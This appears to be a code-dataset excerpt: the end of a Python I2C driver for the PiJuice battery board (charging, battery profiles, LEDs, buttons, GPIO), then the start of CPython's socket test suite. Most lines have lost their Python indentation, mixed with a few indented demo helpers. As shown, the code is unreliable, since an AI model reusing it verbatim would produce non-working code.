return False # Don't suppress exceptions.
def SetChargingConfig(self, config, non_volatile = False):
try:
nv = 0x80 if non_volatile == True else 0x00
if config == True or config == False:
config = {'charging_enabled': config}
if config['charging_enabled'] == True:
chEn = 0x01
elif config['charging_enabled'] == False:
chEn = 0x00
else:
return {'error': 'BAD_ARGUMENT'}
except:
return {'error': 'BAD_ARGUMENT'}
d = [nv | chEn]
ret = self.interface.WriteDataVerify(self.CHARGING_CONFIG_CMD, d)
if non_volatile == False and ret['error'] == 'WRITE_FAILED':
# 'WRITE_FAILED' error when config corresponds to what is stored in EEPROM
# and non_volatile argument is False
ret['error'] = 'NO_ERROR'
return ret
def GetChargingConfig(self):
ret = self.interface.ReadData(self.CHARGING_CONFIG_CMD, 1)
if ret['error'] != 'NO_ERROR':
return ret
else:
return {'data': {'charging_enabled' :bool(ret['data'][0] & 0x01)},
'non_volatile':bool(ret['data'][0]&0x80), 'error':'NO_ERROR'}
batteryProfiles = ['PJZERO_1000', 'BP7X_1820', 'SNN5843_2300', 'PJLIPO_12000', 'PJLIPO_5000', 'PJBP7X_1600', 'PJSNN5843_1300', 'PJZERO_1200', 'BP6X_1400', 'PJLIPO_600', 'PJLIPO_500', 'PJLIPO_2500']
def SelectBatteryProfiles(self, fwver):
if fwver >= 0x15:
self.batteryProfiles = self.batteryProfiles
elif fwver >= 0x14:
self.batteryProfiles = ['PJZERO_1000', 'BP7X_1820', 'SNN5843_2300', 'PJLIPO_12000', 'PJLIPO_5000', 'PJBP7X_1600', 'PJSNN5843_1300', 'PJZERO_1200', 'BP6X_1400', 'PJLIPO_600', 'PJLIPO_500']
elif fwver == 0x13:
self.batteryProfiles = ['BP6X_1400', 'BP7X_1820', 'SNN5843_2300', 'PJLIPO_12000', 'PJLIPO_5000', 'PJBP7X_1600', 'PJSNN5843_1300', 'PJZERO_1200', 'PJZERO_1000', 'PJLIPO_600', 'PJLIPO_500']
else:
self.batteryProfiles = ['BP6X', 'BP7X', 'SNN5843', 'LIPO8047109']
def SetBatteryProfile(self, profile):
id = None
if profile == 'DEFAULT':
id = 0xFF
elif profile == 'CUSTOM':
id = 0x0F
else:
try:
id = self.batteryProfiles.index(profile)
except:
return {'error': 'BAD_ARGUMENT'}
return self.interface.WriteData(self.BATTERY_PROFILE_ID_CMD, [id])
batteryProfileSources = ['HOST', 'DIP_SWITCH', 'RESISTOR']
batteryProfileValidity = ['VALID', 'INVALID']
def GetBatteryProfileStatus(self):
ret = self.interface.ReadData(self.BATTERY_PROFILE_ID_CMD, 1)
if ret['error'] != 'NO_ERROR':
return ret
else:
id = ret['data'][0]
if id == 0xF0:
return {'data': {'validity': 'DATA_WRITE_NOT_COMPLETED'}, 'error': 'NO_ERROR'}
origin = 'CUSTOM' if (id & 0x0F) == 0x0F else 'PREDEFINED'
source = self.batteryProfileSources[(id >> 4) & 0x03]
validity = self.batteryProfileValidity[(id >> 6) & 0x01]
profile = None
try:
profile = self.batteryProfiles[(id & 0x0F)]
except:
profile = 'UNKNOWN'
return {'data': {'validity': validity, 'source': source, 'origin': origin, 'profile': profile}, 'error': 'NO_ERROR'}
def GetBatteryProfile(self):
ret = self.interface.ReadData(self.BATTERY_PROFILE_CMD, 14)
if ret['error'] != 'NO_ERROR':
return ret
else:
d = ret['data']
if all(v == 0 for v in d):
return {'data': 'INVALID', 'error': 'NO_ERROR'}
profile = {}
packed_u16 = (d[1] << 8) | d[0]
profile['capacity'] = 0xFFFFFFFF if (packed_u16==0xFFFF) else (packed_u16&0x7FFF) << (((packed_u16&0x8000) >> 15)*7)
profile['chargeCurrent'] = d[2] * 75 + 550
profile['terminationCurrent'] = d[3] * 50 + 50
profile['regulationVoltage'] = d[4] * 20 + 3500
profile['cutoffVoltage'] = d[5] * 20
profile['tempCold'] = ctypes.c_byte(d[6]).value
profile['tempCool'] = ctypes.c_byte(d[7]).value
profile['tempWarm'] = ctypes.c_byte(d[8]).value
profile['tempHot'] = ctypes.c_byte(d[9]).value
profile['ntcB'] = (d[11] << 8) | d[10]
profile['ntcResistance'] = ((d[13] << 8) | d[12]) * 10
return {'data': profile, 'error': 'NO_ERROR'}
def SetCustomBatteryProfile(self, profile):
d = [0x00] * 14
try:
cap = profile['capacity']
if (cap==0xFFFFFFFF):
packed_u16 = 0xFFFF
else:
c = 4194175 if (cap > 4194175) else cap
packed_u16 = (c >> (int(c>=0x8000)*7)) | int(c>=0x8000)*0x8000 # correction for large capacities over 32767
d[0] = packed_u16 & 0xFF
d[1] = (packed_u16 >> 8) & 0xFF
d[2] = int(round((profile['chargeCurrent'] - 550) // 75))
d[3] = int(round((profile['terminationCurrent'] - 50) // 50))
d[4] = int(round((profile['regulationVoltage'] - 3500) // 20))
d[5] = int(round(profile['cutoffVoltage'] // 20))
d[6] = ctypes.c_ubyte(profile['tempCold']).value
d[7] = ctypes.c_ubyte(profile['tempCool']).value
d[8] = ctypes.c_ubyte(profile['tempWarm']).value
d[9] = ctypes.c_ubyte(profile['tempHot']).value
B = profile['ntcB']
d[10] = B & 0xFF
d[11] = (B >> 8) & 0xFF
R = profile['ntcResistance'] // 10
d[12] = R & 0xFF
d[13] = (R >> 8) & 0xFF
except:
return {'error': 'BAD_ARGUMENT'}
return self.interface.WriteDataVerify(self.BATTERY_PROFILE_CMD, d, 0.2)
batteryChemistries = ['LIPO', 'LIFEPO4']
def GetBatteryExtProfile(self):
ret = self.interface.ReadData(self.BATTERY_EXT_PROFILE_CMD, 17)
if ret['error'] != 'NO_ERROR':
return ret
else:
d = ret['data']
if all(v == 0 for v in d):
return {'data':'INVALID', 'error':'NO_ERROR'}
profile = {}
if d[0] < len(self.batteryChemistries):
profile['chemistry'] = self.batteryChemistries[d[0]]
else:
profile['chemistry'] = 'UNKNOWN'
profile['ocv10'] = (d[2] << 8) | d[1]
profile['ocv50'] = (d[4] << 8) | d[3]
profile['ocv90'] = (d[6] << 8) | d[5]
profile['r10'] = ((d[8] << 8) | d[7])/100.0
profile['r50'] = ((d[10] << 8) | d[9])/100.0
profile['r90'] = ((d[12] << 8) | d[11])/100.0
return {'data':profile, 'error':'NO_ERROR'}
def SetCustomBatteryExtProfile(self, profile):
d = [0x00] * 17
try:
chid = self.batteryChemistries.index(profile['chemistry'])
d[0] = chid&0xFF
v=int(profile['ocv10'])
d[1] = v&0xFF
d[2] = (v >> 8)&0xFF
v=int(profile['ocv50'])
d[3] = v&0xFF
d[4] = (v >> 8)&0xFF
v=int(profile['ocv90'])
d[5] = v&0xFF
d[6] = (v >> 8)&0xFF
v=int(profile['r10']*100)
d[7] = v&0xFF
d[8] = (v >> 8)&0xFF
v=int(profile['r50']*100)
d[9] = v&0xFF
d[10] = (v >> 8)&0xFF
v=int(profile['r90']*100)
d[11] = v&0xFF
d[12] = (v >> 8)&0xFF
d[13] = 0xFF
d[14] = 0xFF
d[15] = 0xFF
d[16] = 0xFF
except:
return {'error':'BAD_ARGUMENT'}
return self.interface.WriteDataVerify(self.BATTERY_EXT_PROFILE_CMD, d, 0.2)
batteryTempSenseOptions = ['NOT_USED', 'NTC', 'ON_BOARD', 'AUTO_DETECT']
def GetBatteryTempSenseConfig(self):
result = self.interface.ReadData(self.BATTERY_TEMP_SENSE_CONFIG_CMD, 1)
if result['error'] != 'NO_ERROR':
return result
else:
d = result['data']
if (d[0]&0x07) < len(self.batteryTempSenseOptions):
return {'data': self.batteryTempSenseOptions[d[0]&0x07], 'error': 'NO_ERROR'}
else:
return {'error': 'UNKNOWN_DATA'}
def SetBatteryTempSenseConfig(self, config):
ret = self.interface.ReadData(self.BATTERY_TEMP_SENSE_CONFIG_CMD, 1)
if ret['error'] != 'NO_ERROR':
return ret
        try:
            ind = self.batteryTempSenseOptions.index(config)
        except ValueError:
            return {'error': 'BAD_ARGUMENT'}
data = [int(ret['data'][0]&(~0x07) | ind)]
return self.interface.WriteDataVerify(self.BATTERY_TEMP_SENSE_CONFIG_CMD, data)
rsocEstimationOptions = ['AUTO_DETECT', 'DIRECT_BY_MCU']
def GetRsocEstimationConfig(self):
result = self.interface.ReadData(self.BATTERY_TEMP_SENSE_CONFIG_CMD, 1)
if result['error'] != 'NO_ERROR':
return result
else:
d = result['data']
if ((d[0]&0x30)>>4) < len(self.rsocEstimationOptions):
return {'data':self.rsocEstimationOptions[(d[0]&0x30)>>4], 'error':'NO_ERROR'}
else:
return {'error':'UNKNOWN_DATA'}
def SetRsocEstimationConfig(self, config):
ret = self.interface.ReadData(self.BATTERY_TEMP_SENSE_CONFIG_CMD, 1)
if ret['error'] != 'NO_ERROR':
return ret
        try:
            ind = self.rsocEstimationOptions.index(config)
        except ValueError:
            return {'error': 'BAD_ARGUMENT'}
data = [(int(ret['data'][0])&(~0x30)) | (ind<<4)]
return self.interface.WriteDataVerify(self.BATTERY_TEMP_SENSE_CONFIG_CMD, data)
powerInputs = ['USB_MICRO', '5V_GPIO']
usbMicroCurrentLimits = ['1.5A', '2.5A']
usbMicroDPMs = list("{0:.2f}".format(4.2+0.08*x)+'V' for x in range(0, 8))
def SetPowerInputsConfig(self, config, non_volatile=False):
d = []
try:
nv = 0x80 if non_volatile == True else 0x00
prec = 0x01 if (config['precedence'] == '5V_GPIO') else 0x00
gpioInEn = 0x02 if (config['gpio_in_enabled'] == True) else 0x00
noBatOn = 0x04 if (config['no_battery_turn_on'] == True) else 0x00
ind = self.usbMicroCurrentLimits.index(config['usb_micro_current_limit'])
if ind == None:
return {'error': 'INVALID_USB_MICRO_CURRENT_LIMIT'}
usbMicroLimit = int(ind) << 3
ind = self.usbMicroDPMs.index(config['usb_micro_dpm'])
if ind == None:
return {'error': 'INVALID_USB_MICRO_DPM'}
dpm = (int(ind) & 0x07) << 4
d = [nv | prec | gpioInEn | noBatOn | usbMicroLimit | dpm]
except:
return {'error': 'BAD_ARGUMENT'}
return self.interface.WriteDataVerify(self.POWER_INPUTS_CONFIG_CMD, d)
def GetPowerInputsConfig(self):
ret = self.interface.ReadData(self.POWER_INPUTS_CONFIG_CMD, 1)
if ret['error'] != 'NO_ERROR':
return ret
d = ret['data'][0]
config = {}
config['precedence'] = self.powerInputs[d & 0x01]
config['gpio_in_enabled'] = bool(d & 0x02)
config['no_battery_turn_on'] = bool(d & 0x04)
config['usb_micro_current_limit'] = self.usbMicroCurrentLimits[(
d >> 3) & 0x01]
config['usb_micro_dpm'] = self.usbMicroDPMs[(d >> 4) & 0x07]
return {'data': config, 'non_volatile': bool(d & 0x80), 'error': 'NO_ERROR'}
buttons = ['SW' + str(i+1) for i in range(0, 3)]
buttonEvents = ['PRESS', 'RELEASE', 'SINGLE_PRESS',
'DOUBLE_PRESS', 'LONG_PRESS1', 'LONG_PRESS2']
def GetButtonConfiguration(self, button):
b = None
try:
b = self.buttons.index(button)
except ValueError:
return {'error': 'BAD_ARGUMENT'}
result = self.interface.ReadData(self.BUTTON_CONFIGURATION_CMD + b, 12)
if result['error'] != 'NO_ERROR':
return result
else:
d = result['data']
config = {}
for i in range(0, len(self.buttonEvents)):
config[self.buttonEvents[i]] = {}
try:
if d[i*2] == 0:
config[self.buttonEvents[i]]['function'] = 'NO_FUNC'
elif d[i*2] & 0xF0 == 0:
config[self.buttonEvents[i]]['function'] = pijuice_hard_functions[(d[i*2] & 0x0F)-1]
elif d[i*2] & 0xF0 == 0x10:
config[self.buttonEvents[i]]['function'] = pijuice_sys_functions[(d[i*2] & 0x0F)-1]
elif d[i*2] & 0xF0 == 0x20:
config[self.buttonEvents[i]]['function'] = pijuice_user_functions[d[i*2] & 0x0F]
else:
config[self.buttonEvents[i]]['function'] = 'UNKNOWN'
except IndexError:
config[self.buttonEvents[i]]['function'] = 'UNKNOWN'
config[self.buttonEvents[i]]['parameter'] = d[i*2+1] * 100
return {'data': config, 'error': 'NO_ERROR'}
def SetButtonConfiguration(self, button, config):
b = None
try:
b = self.buttons.index(button)
except ValueError:
return {'error': 'BAD_ARGUMENT'}
data = [0x00] * (len(self.buttonEvents) * 2)
for i in range(0, len(self.buttonEvents)):
try:
data[i*2] = pijuice_hard_functions.index(
config[self.buttonEvents[i]]['function']) + 0x01
except ValueError:
try:
data[i*2] = pijuice_sys_functions.index(
config[self.buttonEvents[i]]['function']) + 0x11
except:
try:
data[i*2] = pijuice_user_functions.index(
config[self.buttonEvents[i]]['function']) + 0x20
except:
data[i*2] = 0
data[i*2+1] = (int(config[self.buttonEvents[i]]['parameter']) // 100) & 0xff
return self.interface.WriteDataVerify(self.BUTTON_CONFIGURATION_CMD + b, data, 0.4)
leds = ['D1', 'D2']
# XXX: Avoid setting ON_OFF_STATUS
ledFunctionsOptions = ['NOT_USED', 'CHARGE_STATUS', 'USER_LED']
ledFunctions = ['NOT_USED', 'CHARGE_STATUS', 'ON_OFF_STATUS', 'USER_LED']
def GetLedConfiguration(self, led):
i = None
try:
i = self.leds.index(led)
except ValueError:
return {'error': 'BAD_ARGUMENT'}
ret = self.interface.ReadData(self.LED_CONFIGURATION_CMD + i, 4)
if ret['error'] != 'NO_ERROR':
return ret
else:
config = {}
try:
config['function'] = self.ledFunctions[ret['data'][0]]
except:
return {'error': 'UNKNOWN_CONFIG'}
config['parameter'] = {
'r': ret['data'][1],
'g': ret['data'][2],
'b': ret['data'][3]
}
return {'data': config, 'error': 'NO_ERROR'}
def SetLedConfiguration(self, led, config):
i = None
d = [0x00, 0x00, 0x00, 0x00]
try:
i = self.leds.index(led)
d[0] = self.ledFunctions.index(config['function'])
d[1] = int(config['parameter']['r'])
d[2] = int(config['parameter']['g'])
d[3] = int(config['parameter']['b'])
except ValueError:
return {'error': 'BAD_ARGUMENT'}
return self.interface.WriteDataVerify(self.LED_CONFIGURATION_CMD + i, d, 0.2)
powerRegulatorModes = ['POWER_SOURCE_DETECTION', 'LDO', 'DCDC']
def GetPowerRegulatorMode(self):
result = self.interface.ReadData(self.POWER_REGULATOR_CONFIG_CMD, 1)
if result['error'] != 'NO_ERROR':
return result
else:
d = result['data']
if d[0] < len(self.powerRegulatorModes):
return {'data': self.powerRegulatorModes[d[0]], 'error': 'NO_ERROR'}
else:
return {'error': 'UNKNOWN_DATA'}
def SetPowerRegulatorMode(self, mode):
try:
ind = self.powerRegulatorModes.index(mode)
except:
return {'error': 'BAD_ARGUMENT'}
return self.interface.WriteDataVerify(self.POWER_REGULATOR_CONFIG_CMD, [ind])
runPinConfigs = ['NOT_INSTALLED', 'INSTALLED']
def GetRunPinConfig(self):
result = self.interface.ReadData(self.RUN_PIN_CONFIG_CMD, 1)
if result['error'] != 'NO_ERROR':
return result
else:
d = result['data']
if d[0] < len(self.runPinConfigs):
return {'data': self.runPinConfigs[d[0]], 'error': 'NO_ERROR'}
else:
return {'error': 'UNKNOWN_DATA'}
def SetRunPinConfig(self, config):
try:
ind = self.runPinConfigs.index(config)
except:
return {'error': 'BAD_ARGUMENT'}
return self.interface.WriteDataVerify(self.RUN_PIN_CONFIG_CMD, [ind])
ioModes = ['NOT_USED', 'ANALOG_IN', 'DIGITAL_IN', 'DIGITAL_OUT_PUSHPULL',
'DIGITAL_IO_OPEN_DRAIN', 'PWM_OUT_PUSHPULL', 'PWM_OUT_OPEN_DRAIN']
ioSupportedModes = {
1: ['NOT_USED', 'ANALOG_IN', 'DIGITAL_IN', 'DIGITAL_OUT_PUSHPULL',
'DIGITAL_IO_OPEN_DRAIN', 'PWM_OUT_PUSHPULL', 'PWM_OUT_OPEN_DRAIN'],
2: ['NOT_USED', 'DIGITAL_IN', 'DIGITAL_OUT_PUSHPULL',
'DIGITAL_IO_OPEN_DRAIN', 'PWM_OUT_PUSHPULL', 'PWM_OUT_OPEN_DRAIN']
}
ioPullOptions = ['NOPULL', 'PULLDOWN', 'PULLUP']
ioConfigParams = {
'DIGITAL_IN': [{'name': 'wakeup', 'type': 'enum', 'options':['NO_WAKEUP', 'FALLING_EDGE', 'RISING_EDGE']}],
'DIGITAL_OUT_PUSHPULL': [{'name': 'value', 'type': 'int', 'min': 0, 'max': 1}],
'DIGITAL_IO_OPEN_DRAIN': [{'name': 'value', 'type': 'int', 'min': 0, 'max': 1}],
'PWM_OUT_PUSHPULL': [{'name': 'period', 'unit': 'us', 'type': 'int', 'min': 2, 'max': 65536 * 2},
{'name': 'duty_cycle', 'unit': '%', 'type': 'float', 'min': 0, 'max': 100}],
'PWM_OUT_OPEN_DRAIN': [{'name': 'period', 'unit': 'us', 'type': 'int', 'min': 2, 'max': 65536 * 2},
{'name': 'duty_cycle', 'unit': '%', 'type': 'float', 'min': 0, 'max': 100}]
}
def SetIoConfiguration(self, io_pin, config, non_volatile=False):
d = [0x00, 0x00, 0x00, 0x00, 0x00]
try:
mode = self.ioModes.index(config['mode'])
pull = self.ioPullOptions.index(config['pull'])
nv = 0x80 if non_volatile == True else 0x00
d[0] = (mode & 0x0F) | ((pull & 0x03) << 4) | nv
if config['mode'] == 'DIGITAL_IN':
wup = config['wakeup'] if config['wakeup'] else 'NO_WAKEUP'
d[1] = self.ioConfigParams['DIGITAL_IN'][0]['options'].index(wup) & 0x03
elif config['mode'] == 'DIGITAL_OUT_PUSHPULL' or config['mode'] == 'DIGITAL_IO_OPEN_DRAIN':
d[1] = int(config['value']) & 0x01 # output value
elif config['mode'] == 'PWM_OUT_PUSHPULL' or config['mode'] == 'PWM_OUT_OPEN_DRAIN':
p = int(config['period'])
if p >= 2:
p = p // 2 - 1
else:
return {'error': 'INVALID_PERIOD'}
d[1] = p & 0xFF
d[2] = (p >> 8) & 0xFF
d[3] = 0xFF
d[4] = 0xFF
dc = float(config['duty_cycle'])
if dc < 0 or dc > 100:
return {'error': 'INVALID_CONFIG'}
elif dc < 100:
dci = int(dc*65534//100)
d[3] = dci & 0xFF
d[4] = (dci >> 8) & 0xFF
except:
return {'error': 'INVALID_CONFIG'}
return self.interface.WriteDataVerify(self.IO_CONFIGURATION_CMD + (io_pin-1)*5, d, 0.2)
def GetIoConfiguration(self, io_pin):
ret = self.interface.ReadData(self.IO_CONFIGURATION_CMD + (io_pin-1)*5, 5)
if ret['error'] != 'NO_ERROR':
return ret
else:
d = ret['data']
nv = bool(d[0] & 0x80)
mode = self.ioModes[d[0] & 0x0F] if ((d[0] & 0x0F) < len(self.ioModes)) else 'UNKNOWN'
pull = self.ioPullOptions[(d[0] >> 4) & 0x03] if (((d[0] >> 4) & 0x03) < len(self.ioPullOptions)) else 'UNKNOWN'
if mode == 'DIGITAL_OUT_PUSHPULL' or mode == 'DIGITAL_IO_OPEN_DRAIN':
return {'data': {'mode': mode, 'pull': pull, 'value': int(d[1])},
'non_volatile': nv, 'error': 'NO_ERROR'}
elif mode == 'PWM_OUT_PUSHPULL' or mode == 'PWM_OUT_OPEN_DRAIN':
per = ((d[1] | (d[2] << 8)) + 1) * 2
dci = d[3] | (d[4] << 8)
dc = float(dci) * 100 // 65534 if dci < 65535 else 100
return {'data': {'mode': mode, 'pull': pull, 'period': per, 'duty_cycle': dc},
'non_volatile': nv, 'error': 'NO_ERROR'}
else:
wup = self.ioConfigParams['DIGITAL_IN'][0]['options'][d[1]&0x03] if d[1]&0x03 < len(self.ioConfigParams['DIGITAL_IN'][0]['options']) else ''
return {'data': {'mode': mode, 'pull': pull, 'wakeup': wup},
'non_volatile': nv, 'error': 'NO_ERROR'}
def GetAddress(self, slave):
if slave != 1 and slave != 2:
return {'error': 'BAD_ARGUMENT'}
result = self.interface.ReadData(self.I2C_ADDRESS_CMD + slave - 1, 1)
if result['error'] != 'NO_ERROR':
return result
else:
return {'data': format(result['data'][0], 'x'), 'error': 'NO_ERROR'}
def SetAddress(self, slave, hexAddress):
adr = None
try:
adr = int(str(hexAddress), 16)
except:
return {'error': 'BAD_ARGUMENT'}
if (slave != 1 and slave != 2) or adr < 0 or adr > 0x7F:
return {'error': 'BAD_ARGUMENT'}
return self.interface.WriteData(self.I2C_ADDRESS_CMD + slave - 1, [adr])
def GetIdEepromWriteProtect(self):
ret = self.interface.ReadData(self.ID_EEPROM_WRITE_PROTECT_CTRL_CMD, 1)
if ret['error'] != 'NO_ERROR':
return ret
else:
status = True if ret['data'][0] == 1 else False
return {'data': status, 'error': 'NO_ERROR'}
def SetIdEepromWriteProtect(self, status):
d = None
if status == True:
d = 1
elif status == False:
d = 0
else:
return {'error': 'BAD_ARGUMENT'}
return self.interface.WriteDataVerify(self.ID_EEPROM_WRITE_PROTECT_CTRL_CMD, [d])
idEepromAddresses = ['50', '52']
def GetIdEepromAddress(self):
ret = self.interface.ReadData(self.ID_EEPROM_ADDRESS_CMD, 1)
if ret['error'] != 'NO_ERROR':
return ret
else:
return {'data': format(ret['data'][0], 'x'), 'error': 'NO_ERROR'}
def SetIdEepromAddress(self, hexAddress):
if str(hexAddress) in self.idEepromAddresses:
adr = int(str(hexAddress), 16)
else:
return {'error': 'BAD_ARGUMENT'}
return self.interface.WriteDataVerify(self.ID_EEPROM_ADDRESS_CMD, [adr])
def SetDefaultConfiguration(self):
return self.interface.WriteData(self.RESET_TO_DEFAULT_CMD, [0xaa, 0x55, 0x0a, 0xa3])
def GetFirmwareVersion(self):
ret = self.interface.ReadData(self.FIRMWARE_VERSION_CMD, 2)
if ret['error'] != 'NO_ERROR':
return ret
else:
major_version = ret['data'][0] >> 4
            minor_version = ret['data'][0] & 0x0f
version_str = '%i.%i' % (major_version, minor_version)
return {'data': {
'version': version_str,
'variant': format(ret['data'][1], 'x')},
'error': 'NO_ERROR'}
def RunTestCalibration(self):
self.interface.WriteData(248, [0x55, 0x26, 0xa0, 0x2b])
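# Illustrative sketch: GetFirmwareVersion above packs major.minor into one byte
# (major in the high nibble, minor in the low nibble). A standalone decoder
# (hypothetical helper, not used by the driver):
def demo_decode_firmware_version(version_byte):
    major = (version_byte >> 4) & 0x0F
    minor = version_byte & 0x0F
    return '%i.%i' % (major, minor)
# demo_decode_firmware_version(0x15) -> '1.5'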
# Create an interface object for accessing PiJuice features via I2C bus.
class PiJuice(object):
def __init__(self, bus=1, address=0x14):
self.interface = PiJuiceInterface(bus, address)
self.status = PiJuiceStatus(self.interface)
self.config = PiJuiceConfig(self.interface)
self.power = PiJuicePower(self.interface)
self.rtcAlarm = PiJuiceRtcAlarm(self.interface)
def __enter__(self):
# Just return this object so it can be used in a with statement
return self
def __exit__(self, exc_type, exc_val, exc_tb):
return False # Don't suppress exceptions.
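# Illustrative usage sketch: how the PiJuice wrapper above might be used to
# read basic telemetry. It requires PiJuice hardware on the given I2C bus, so
# it is wrapped in a function and never called here.
def demo_read_basic_telemetry(bus=1, address=0x14):
    pj = PiJuice(bus, address)
    charge = pj.status.GetChargeLevel()      # {'data': <percent>, 'error': ...}
    status = pj.status.GetStatus()           # battery / power-input flags
    voltage = pj.status.GetBatteryVoltage()  # millivolts
    return charge, status, voltage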
def get_versions():
import os
try:
p = PiJuice()
firmware_version_dict = p.config.GetFirmwareVersion()
    except Exception:
firmware_version_dict = {}
uname = os.uname()
os_version = ' '.join((uname[0], uname[2], uname[3]))
firmware_version = firmware_version_dict.get('data', {}).get('version')
return __version__, firmware_version, os_version
if __name__ == '__main__':
    if len(sys.argv) > 1 and sys.argv[1] == '--version':
sw_version, fw_version, os_version = get_versions()
print("Software version: %s" % sw_version)
if fw_version is None:
fw_version = "No connection to PiJuice"
print("Firmware version: %s" % fw_version)
print("OS version: %s" % os_version)
|
test_socket.py
|
import unittest
from test import support
import errno
import io
import itertools
import socket
import select
import tempfile
import time
import traceback
import queue
import sys
import os
import array
import contextlib
from weakref import proxy
import signal
import math
import pickle
import struct
import random
import shutil
import string
import _thread as thread
import threading
try:
import multiprocessing
except ImportError:
multiprocessing = False
try:
import fcntl
except ImportError:
fcntl = None
HOST = support.HOST
# test unicode string and carriage return
MSG = 'Michael Gilfix was here\u1234\r\n'.encode('utf-8')
MAIN_TIMEOUT = 60.0
VSOCKPORT = 1234
try:
import _socket
except ImportError:
_socket = None
def get_cid():
if fcntl is None:
return None
try:
with open("/dev/vsock", "rb") as f:
r = fcntl.ioctl(f, socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID, " ")
except OSError:
return None
else:
return struct.unpack("I", r)[0]
def _have_socket_can():
"""Check whether CAN sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_can_isotp():
"""Check whether CAN ISOTP sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_rds():
"""Check whether RDS sockets are supported on this host."""
try:
s = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_alg():
"""Check whether AF_ALG sockets are supported on this host."""
try:
s = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_qipcrtr():
"""Check whether AF_QIPCRTR sockets are supported on this host."""
try:
s = socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_vsock():
"""Check whether AF_VSOCK sockets are supported on this host."""
ret = get_cid() is not None
return ret
@contextlib.contextmanager
def socket_setdefaulttimeout(timeout):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(timeout)
yield
finally:
socket.setdefaulttimeout(old_timeout)
HAVE_SOCKET_CAN = _have_socket_can()
HAVE_SOCKET_CAN_ISOTP = _have_socket_can_isotp()
HAVE_SOCKET_RDS = _have_socket_rds()
HAVE_SOCKET_ALG = _have_socket_alg()
HAVE_SOCKET_QIPCRTR = _have_socket_qipcrtr()
HAVE_SOCKET_VSOCK = _have_socket_vsock()
# Size in bytes of the int type
SIZEOF_INT = array.array("i").itemsize
class SocketTCPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(self.serv)
self.serv.listen()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketUDPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.port = support.bind_port(self.serv)
def tearDown(self):
self.serv.close()
self.serv = None
class ThreadSafeCleanupTestCase(unittest.TestCase):
"""Subclass of unittest.TestCase with thread-safe cleanup methods.
This subclass protects the addCleanup() and doCleanups() methods
with a recursive lock.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._cleanup_lock = threading.RLock()
def addCleanup(self, *args, **kwargs):
with self._cleanup_lock:
return super().addCleanup(*args, **kwargs)
def doCleanups(self, *args, **kwargs):
with self._cleanup_lock:
return super().doCleanups(*args, **kwargs)
class SocketCANTest(unittest.TestCase):
"""To be able to run this test, a `vcan0` CAN interface can be created with
the following commands:
# modprobe vcan
# ip link add dev vcan0 type vcan
# ifconfig vcan0 up
"""
interface = 'vcan0'
bufsize = 128
"""The CAN frame structure is defined in <linux/can.h>:
struct can_frame {
canid_t can_id; /* 32 bit CAN_ID + EFF/RTR/ERR flags */
__u8 can_dlc; /* data length code: 0 .. 8 */
__u8 data[8] __attribute__((aligned(8)));
};
"""
can_frame_fmt = "=IB3x8s"
can_frame_size = struct.calcsize(can_frame_fmt)
"""The Broadcast Management Command frame structure is defined
in <linux/can/bcm.h>:
struct bcm_msg_head {
__u32 opcode;
__u32 flags;
__u32 count;
struct timeval ival1, ival2;
canid_t can_id;
__u32 nframes;
struct can_frame frames[0];
}
`bcm_msg_head` must be 8 bytes aligned because of the `frames` member (see
`struct can_frame` definition). Must use native not standard types for packing.
"""
bcm_cmd_msg_fmt = "@3I4l2I"
bcm_cmd_msg_fmt += "x" * (struct.calcsize(bcm_cmd_msg_fmt) % 8)
def setUp(self):
self.s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
self.addCleanup(self.s.close)
try:
self.s.bind((self.interface,))
except OSError:
self.skipTest('network interface `%s` does not exist' %
self.interface)
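# Illustrative sketch: can_frame_fmt above ("=IB3x8s") mirrors struct can_frame,
# so a raw CAN frame can be built and parsed with the struct module. These
# hypothetical helpers are for demonstration only:
def demo_build_can_frame(can_id, data):
    # struct pads the data field to 8 bytes as required by can_frame.
    can_dlc = len(data)
    return struct.pack(SocketCANTest.can_frame_fmt, can_id, can_dlc, data)
def demo_dissect_can_frame(frame):
    can_id, can_dlc, data = struct.unpack(SocketCANTest.can_frame_fmt, frame)
    return can_id, can_dlc, data[:can_dlc]
# demo_dissect_can_frame(demo_build_can_frame(0x123, b'\x01\x02')) -> (0x123, 2, b'\x01\x02')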
class SocketRDSTest(unittest.TestCase):
"""To be able to run this test, the `rds` kernel module must be loaded:
# modprobe rds
"""
bufsize = 8192
def setUp(self):
self.serv = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
self.addCleanup(self.serv.close)
try:
self.port = support.bind_port(self.serv)
except OSError:
self.skipTest('unable to bind RDS socket')
class ThreadableTest:
"""Threadable Test class
The ThreadableTest class makes it easy to create a threaded
client/server pair from an existing unit test. To create a
new threaded class from an existing unit test, use multiple
inheritance:
class NewClass (OldClass, ThreadableTest):
pass
This class defines two new fixture functions with obvious
purposes for overriding:
clientSetUp ()
clientTearDown ()
Any new test functions within the class must then define
tests in pairs, where the test name is preceded with a
'_' to indicate the client portion of the test. Ex:
def testFoo(self):
# Server portion
def _testFoo(self):
# Client portion
Any exceptions raised by the clients during their tests
are caught and transferred to the main thread to alert
the testing framework.
Note, the server setup function cannot call any blocking
functions that rely on the client thread during setup,
unless serverExplicitReady() is called just before
the blocking call (such as in setting up a client/server
    connection and performing the accept() in setUp()).
"""
def __init__(self):
# Swap the true setup function
self.__setUp = self.setUp
